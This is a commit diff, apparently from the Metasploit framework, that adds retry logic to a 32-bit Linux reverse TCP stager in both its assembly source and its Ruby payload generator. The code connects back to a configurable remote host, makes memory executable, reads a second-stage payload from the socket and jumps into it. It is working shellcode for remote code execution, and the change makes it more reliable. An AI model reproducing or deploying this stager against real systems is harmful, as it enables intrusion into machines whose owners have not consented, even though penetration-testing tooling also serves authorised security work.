add retry to linux reverse tcp x86

2017-07-14 12:30:36 +09:00 · 2017-07-14 12:30:36 +09:00 · 4e046db9b3
parent 62533509c6
commit 4e046db9b3
2 changed files with 36 additions and 11 deletions
--- a/external/source/shellcode/linux/ia32/stager_sock_reverse.asm
+++ b/external/source/shellcode/linux/ia32/stager_sock_reverse.asm
@ -33,11 +33,13 @@ BITS   32
 GLOBAL _start

 _start:
+	push 0x5              ; retry counter
+	pop esi
+
+create_socket:
 	xor  ebx, ebx
 	mul  ebx
-
-; int socket(int domain, int type, int protocol);
-socket:
+	; int socket(int domain, int type, int protocol);
 	push ebx              ; protocol = 0 = first that matches this type and domain, i.e. tcp
 	inc  ebx              ; 1 = SYS_SOCKET
 	push ebx              ; type     = 1 = SOCK_STREAM
@ -47,13 +49,15 @@ socket:
 	int  0x80
 	xchg eax, edi

-; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
-connect:
-	pop  ebx
+set_address:
+	pop ebx                    ; set ebx back to zero
 	push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
 	push 0xbfbf0002       ; addr->sin_port = 49087
 	                      ; addr->sin_family = 2 = AF_INET
 	mov  ecx, esp         ; ecx = addr
+
+; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+try_connect:
 	push byte 0x66        ; __NR_socketcall
 	pop  eax
 	push eax              ; addrlen
@ -63,7 +67,12 @@ connect:
 	inc  ebx              ; 3 = SYS_CONNECT
 	int  0x80
 	test eax, eax
-  js failed
+	jns mprotect
+
+handle_failure:
+	dec esi
+	jnz create_socket
+	jmp failed

 %ifndef USE_SINGLE_STAGE

@ -76,6 +85,8 @@ mprotect:
 	shl  ebx, 12
 	mov  al, 0x7d         ; __NR_mprotect
 	int  0x80
+	test eax, eax
+	js failed

 ; ssize_t read(int fd, void *buf, size_t count);
 recv:
@ -85,6 +96,8 @@ recv:
 	mov  dh, 0xc          ; count = 0xc00
 	mov  al, 0x3          ; __NR_read
 	int  0x80
+	test eax, eax
+	js failed
 	jmp  ecx

 failed:
--- a/lib/msf/core/payload/linux/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp.rb
@ -91,6 +91,9 @@ module Payload::Linux::ReverseTcp
    encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first

    asm = %Q^
+        push #{retry_count}        ; retry counter
+        pop esi
+      create_socket:
        xor ebx, ebx
        mul ebx
        push ebx
@ -100,14 +103,15 @@ module Payload::Linux::ReverseTcp
        mov al, 0x66
        mov ecx, esp
        int 0x80                   ; sys_socketcall (socket())
-        test eax, eax
-        js failed
-
        xchg eax, edi              ; store the socket in edi
+
+      set_address:
        pop ebx                    ; set ebx back to zero
        push #{encoded_host}
        push #{encoded_port}
        mov ecx, esp
+
+      try_connect:
        push 0x66
        pop eax
        push eax
@ -117,12 +121,18 @@ module Payload::Linux::ReverseTcp
        inc ebx
        int 0x80                   ; sys_socketcall (connect())
        test eax, eax
-        js failed
+        jns mprotect
+
+      handle_failure:
+        dec esi
+        jnz create_socket
+        jmp failed
    ^

    asm << asm_send_uuid if include_send_uuid

    asm << %Q^
+      mprotect:
        mov dl, 0x7
        mov ecx, 0x1000
        mov ebx, esp
@ -133,6 +143,7 @@ module Payload::Linux::ReverseTcp
        test eax, eax
        js failed

+      recv:
        pop ebx
        mov ecx, esp
        cdq
@ -142,6 +153,7 @@ module Payload::Linux::ReverseTcp
        test eax, eax
        js failed
        jmp ecx
+
      failed:
        mov eax, 0x1
        mov ebx, 0x1              ; set exit status to 1